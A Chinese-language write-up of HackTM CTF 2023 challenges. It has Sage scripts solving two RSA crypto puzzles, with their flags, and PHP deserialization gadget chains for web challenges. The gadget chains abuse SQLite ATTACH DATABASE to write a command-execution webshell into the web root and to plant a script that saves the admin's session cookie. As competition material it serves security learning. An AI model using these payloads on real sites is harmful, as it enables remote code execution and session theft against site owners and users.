HackTM CTF 2023 WriteUps
這次雖然是在 nyahello
裡面參加得到第四名,不過實際上是和 ginoah 和 Jwang 一起參加才有這樣的結果的。
一般的 RSA,不過 ,而且還給了 和 的 ciphertext。
這題因為 很小所以 中的 其實不會很大,根據測試只會是 而已,所以就能得到 和 的關係式。兩個列出來之後 gcd 就能求出解了。
from Crypto.Util.number import *
e = 3
n = 24476383567792760737445809443492789639532562013922247811020136923589010741644222420227206374197451638950771413340924096340837752043249937740661704552394497914758536695641625358888570907798672682231978378863166006326676708689766394246962358644899609302315269836924417613853084331305979037961661767481870702409724154783024602585993523452019004639755830872907936352210725695418551084182173371461071253191795891364697373409661909944972555863676405650352874457152520233049140800885827642997470620526948414532553390007363221770832301261733085022095468538192372251696747049088035108525038449982810535032819511871880097702167
enc_d = 23851971033205169724442925873736356542293022048328010529601922038597156073052741135967263406916098353904000351147783737673489182435902916159670398843992581022424040234578709904403027939686144718982884200573860698818686908312301218022582288691503272265090891919878763225922888973146019154932207221041956907361037238034826284737842344007626825211682868274941550017877866773242511532247005459314727939294024278155232050689062951137001487973659259356715242237299506824804517181218221923331473121877871094364766799442907255801213557820110837044140390668415470724167526835848871056818034641517677763554906855446709546993374
enc_phi = 3988439673093122433640268099760031932750589560901017694612294237734994528445711289776522094320029720250901589476622749396945875113134575148954745649956408698129211447217738399970996146231987508863215840103938468351716403487636203224224211948248426979344488189039912815110421219060901595845157989550626732212856972549465190609710288441075239289727079931558808667820980978069512061297536414547224423337930529183537834934423347408747058506318052591007082711258005394876388007279867425728777595263973387697391413008399180495885227570437439156801767814674612719688588210328293559385199717899996385433488332567823928840559
enc_flag = 24033688910716813631334059349597835978066437874275978149197947048266360284414281504254842680128144566593025304122689062491362078754654845221441355173479792783568043865858117683452266200159044180325485093879621270026569149364489793568633147270150444227384468763682612472279672856584861388549164193349969030657929104643396225271183660397476206979899360949458826408961911095994102002214251057409490674577323972717947269749817048145947578717519514253771112820567828846282185208033831611286468127988373756949337813132960947907670681901742312384117809682232325292812758263309998505244566881893895088185810009313758025764867
P = Zmod(n)["sd"]
sd = P.gen()
sphi = (3 * sd - 1) / 2
f = sd ^ e - enc_d
g = sphi ^ e - enc_phi
while g:
f, g = g, f % g
dd = ZZ(-f[0] / f[1])
flag = pow(enc_flag, dd, n)
# HackTM{Have you warmed up? If not, I suggest you consider the case where e=65537, although I don't know if it's solvable. Why did I say that? Because I have to make this flag much longer to avoid solving it just by calculating the cubic root of enc_flag.}
from math import gcd
from Crypto.Util.number import bytes_to_long, isPrime
from secret import p, q, x1, y1, x2, y2, e, flag
# properties of secret variables
assert isPrime(p) and p.bit_length() == 768
assert isPrime(q) and q.bit_length() == 768
assert isPrime(e) and e.bit_length() == 256
assert gcd((p - 1) * (q - 1), e) == 1
assert x1.bit_length() <= 768 and x2.bit_length() <= 768
assert y1.bit_length() <= 640 and y2.bit_length() <= 640
assert x1 ** 2 + e * y1 ** 2 == p * q
assert x2 ** 2 + e * y2 ** 2 == p * q
# encrypt flag by RSA, with xor
n = p * q
c = pow(bytes_to_long(flag) ^^ x1 ^^ y1 ^^ x2 ^^ y2, e, n)
print(f"{n = }")
print(f"{c = }")
# hints 🍣
F = RealField(1337)
x = vector(F, [x1, x2])
y = vector(F, [y1, y2])
# rotate
theta = F.random_element(min=-pi, max=pi)
R = matrix(F, [[cos(theta), -sin(theta)], [sin(theta), cos(theta)]])
x = R * x
y = R * y
print(f"{x = }")
print(f"{y = }")
首先目標明顯是要先找到 的值。因為它被一個旋轉矩陣給旋轉了,所以肯定存在一個反向的旋轉可以把 兩個給轉回來。
所以可以設 符合 ,然後用 之類的方法把它轉正,然後利用那兩條 的等式一共可以得到三個等式,其中只有三個未知數 而已。所以先 resultant 得到一個只有 的等式對它求根理論上就能得到 。
不過它旋轉的時候是有 precision 的限制,所以我是先在 上計算之後在 RealField(1337 * 100)
下對它求根,可以找到好幾個約 256 bits 的根,那些都是 的 candidates。
之後就一個一個試然後求 ,然後再求回 檢查看看符不符合條件就行了。
最後一部是要從 做分解,我這邊是把 那項消掉得到 Congruence of squares,然後 gcd 就結束了。
from Crypto.Util.number import *
n = 990853953648382437503731888872568785013804329239290721076418541795771569507440261620612308640652961121590348037236708702361580700250705591203587939980126323233833431892076634892318387020242015741789265095380967467201291693288654956012435416445991341222221539511583706970342630678909437274145759598920314784293470918464283814408418704426938549136143925649863711450268227592032494660523680280136089617838412326902639568680941504799777445608524961048789627301462833
x = (
y = (
rx1, rx2 = map(QQ, x)
ry1, ry2 = map(QQ, y)
P = QQ["c,s,e"]
c, s, e = P.gens()
xx1 = rx1 * c - rx2 * s
xx2 = rx1 * s + rx2 * c
yy1 = ry1 * c - ry2 * s
yy2 = ry1 * s + ry2 * c
eq1 = xx1 ^ 2 + e * yy1 ^ 2 - n
eq2 = xx2 ^ 2 + e * yy2 ^ 2 - n
eq3 = c ^ 2 + s ^ 2 - 1
f = eq1.sylvester_matrix(eq3, c).det()
g = eq2.sylvester_matrix(eq3, c).det()
h = f.sylvester_matrix(g, s).det().univariate_polynomial()
rs = h.roots(ring=RealField(1337 * 100), multiplicities=False)
e_cand = [round(r) for r in rs]
# e_cand = [87862026872437330910497185030697130217338158176670400983287915720335274355400,
# 87862026872437330910497185030697130217338158176670400983287915720335274355400,
# 111578009802636409437123757591617048189760145423552421418627338749835916561801,
# 111578009802636409437123757591617048189760145423552421418627338749835916561801,
# 136040713794094450815869383226050188669842227306130890897967195238883374113103,
# 136040713794094450815869383226050188669842227306130890897967195238883374113103,
# 200903536402584876156876716733848460295431647412230359371202416138893151947346,
# 200903536402584876156876716733848460295431647412230359371202416138893151947346]
def try_e(e):
P = QQ["c,s"]
c, s = P.gens()
xx1 = rx1 * c - rx2 * s
xx2 = rx1 * s + rx2 * c
yy1 = ry1 * c - ry2 * s
yy2 = ry1 * s + ry2 * c
eq1 = xx1 ^ 2 + e * yy1 ^ 2 - n
eq2 = xx2 ^ 2 + e * yy2 ^ 2 - n
eq3 = c ^ 2 + s ^ 2 - 1
f = eq1.sylvester_matrix(eq2, s).det().univariate_polynomial()
ccc = f.roots(ring=RealField(1337), multiplicities=False)
for c in ccc:
s = sqrt(1 - c ^ 2)
xx1 = round(rx1 * c - rx2 * s)
xx2 = round(rx1 * s + rx2 * c)
yy1 = round(ry1 * c - ry2 * s)
yy2 = round(ry1 * s + ry2 * c)
if (xx1 ^ 2 + e * yy1 ^ 2 == n) and (xx2 ^ 2 + e * yy2 ^ 2 == n):
return xx1, xx2, yy1, yy2
for e in e_cand:
r = try_e(e)
if r:
x1, x2, y1, y2 = map(abs, r)
assert x1.bit_length() <= 768 and x2.bit_length() <= 768
assert y1.bit_length() <= 640 and y2.bit_length() <= 640
assert x1**2 + e * y1**2 == n
assert x2**2 + e * y2**2 == n
# eliminate e to get congruence of squares
# (x1*y2)^2 = (x2*y1)^2 (mod n)
p = gcd(x1 * y2 - x2 * y1, n)
q = n // p
assert p * q == n
d = inverse_mod(e, (p - 1) * (q - 1))
c = 312168688094168684887530746663711142224819184527420449851136749248641895825646649162310024737395663075921549510262779965673286770730468773215063305158197748549937395602308558217528064655976647148323981103647078862713773074121667862786737690376212246588956833193632937835958166526006128435536115531865213269197137648990987207140262543956087199861542889002996727146832659889656384027201202873352819689303456895088190857667281342371263570535523695457095802010885279
m = pow(c, d, n)
flag = m ^^ x1 ^^ y1 ^^ x2 ^^ y2
# HackTM{r07473_pr353rv35_50m37h1n6}
至於最後那個部分按照別人的說法,可以解釋為從 到 的 homomorphism。
最後是官解 writeup,和我的作法差蠻多的 XD。
Blog / Blog Revenge
兩題題目一樣,一個 flag path 已知只要 LFI,一個要 RCE。因為這題是自己寫 php unserialization 的題目所以就跳過 LFI 直接 RCE 了。
這題能用的 gadgets 沒有直接 RCE 的地方,不過裡面有辦法控制 sqlite 的執行指令,所以用 sql 寫 webshell 就行了。
class Query {
public $query_string = "";
public $args;
public function __construct($query_string, $args) {
$this->query_string = $query_string;
$this->args = $args;
// for debugging purposes
public function __toString() {
return $this->query_string;
class Conn {
public $queries;
public function __construct()
$this->queries = [];
$this->queries[] = new Query("ATTACH DATABASE '/var/www/html/peko.php' AS lol;", []);
$this->queries[] = new Query("CREATE TABLE lol.pwn (dataz text);", []);
$this->queries[] = new Query('INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET[\'cmd\']); ?>");--', []);
class Post {
public $title;
public $content;
public $comments;
public function __construct($title, $content) {
$this->title = $title;
$this->content = $content;
class User {
public $profile;
public function __construct($profile)
$this->profile = $profile;
echo base64_encode(serialize(new User(new Post(new User(new Conn()), 1, 1))));
這題顯然是個 xsleaks 題目,主要是 note 搜尋功能在成功和失敗時會 redirect 到不同的 domain 去 (secrets.wtl.pw
, results.wtl.pw
),所以我有用 CSP violation 想辦法去弄,但是後來遇到的問題是 admin bot timeout 太短 (5s),不知道怎麼處理。
後來 dig 一下發現這兩個 domain 的 ip 和 Blog / Blog Revenge 是同一台 (secrets.wtl.pw:30001
可以存取到),而它為了 share cookie 所以 cookie domain 是 .wtl.pw
,所以只要上個 webshell 把 session cookie 紀錄下來就能得到 admin cookie,然後讀 flag 即可。
class Query {
public $query_string = "";
public $args;
public function __construct($query_string, $args) {
$this->query_string = $query_string;
$this->args = $args;
// for debugging purposes
public function __toString() {
return $this->query_string;
class Conn {
public $queries;
public function __construct()
$this->queries = [];
$this->queries[] = new Query("ATTACH DATABASE '/var/www/html/peko.php' AS lol;", []);
$this->queries[] = new Query("CREATE TABLE lol.pwn (dataz text);", []);
$this->queries[] = new Query('INSERT INTO lol.pwn (dataz) VALUES ("<?php file_put_contents(\'/var/www/html/peko.txt\', $_COOKIE[\'session\']); ?>");--', []);
class Post {
public $title;
public $content;
public $comments;
public function __construct($title, $content) {
$this->title = $title;
$this->content = $content;
class User {
public $profile;
public function __construct($profile)
$this->profile = $profile;
echo base64_encode(serialize(new User(new Post(new User(new Conn()), 1, 1))));
// curl 'http://secrets.wtl.pw:30001' --cookie "user=$(php gen.php)"
其他正經的 xsleaks 解法: